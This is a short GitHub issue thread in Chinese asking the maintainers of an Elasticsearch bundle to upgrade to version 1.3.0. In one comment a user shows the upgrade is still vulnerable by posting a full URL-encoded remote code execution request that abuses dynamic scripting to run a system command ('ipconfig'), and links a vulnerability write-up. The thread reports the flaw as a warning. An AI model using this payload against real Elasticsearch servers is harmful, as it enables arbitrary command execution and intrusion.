### ISSUE TITLE
求升级ES 1.3.0

### ISSUE THREAD

**Issue by yhostc** [medcl/elasticsearch-rtf#23]
求升级ES到1.3.0啊

**Comment by reedmi** [comment]
升级1.3之后的还是有问题的呀：
http://localhost:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\%22ipconfig\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}

**Comment by reedmi** [comment]
漏洞请看：http://www.i0day.com/1682.html

**Comment by jackton** [comment]
还升级什么呀.自己安装官方版本即可. 支持中文插件

WWW.ZIY.CC

2015-07-27 11:36 GMT+08:00 reedmi <notifications@github.com>:

**Comment by edagarli** [comment]
漏洞太多。
